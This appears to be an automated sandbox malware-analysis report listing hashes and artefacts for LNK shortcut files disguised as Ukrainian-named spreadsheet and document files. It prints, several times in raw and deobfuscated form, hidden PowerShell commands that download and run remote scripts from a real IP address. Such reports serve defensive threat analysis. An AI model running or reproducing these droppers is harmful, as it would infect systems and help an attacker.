Infection Chain
Summary by MalvaGPT
Characteristics
Hash: Hash Value
MD5: 230888af63fe269a3ff7a79ca6b5cf2f
Sha1: 2d10c9666c6e73c7fcd69b673c47d3d4e759113e
Sha256: e466e80fd69cf939b7dd29524b5b6001be7ae4709619c8eef69bb49329b1152d
Sha384: 191cb8baf57acf161bc713b9ddc335627edbe06b12c21765adff3cf0286cd3be37d88370f9c298e42ca3df386a4f2413
Sha512: 0d3c8c7acf00a5b7a813aaf03220d9b019e796cf5bcd5e0f401b4aabb3f9a113ae1d95b9f9c8f09e5f59e5c48d87c1887e70950a9e2bed9eb1c662027be73140
SSDeep: 48:mTPbpf8RDKEPS8pdNZZpEbpf8v28fKEPS8i7dNZ8tTog4:mTDpfV8ypfy2X8iiTN4
TLSH: 13D3B87076F56B14F0B65ABCAE76268999367A18DB33C74C0114A24E2A30F14DD15B3B
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/chafefantastic.ps1') })))

LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/signalroot.ps1') })))

Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/chafefantastic.ps1"))))

Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/signalroot.ps1"))))

230888af63fe269a3ff7a79ca6b5cf2f (135.16 KB)
No malware configuration was found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/chafefantastic.ps1') })))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > ШПС.xlsx.lnk

LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/signalroot.ps1') })))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > Розпорядження.docx.lnk

Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/chafefantastic.ps1"))))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > ШПС.xlsx.lnk > LNK CommandLine

Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/signalroot.ps1"))))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > Розпорядження.docx.lnk > LNK CommandLine
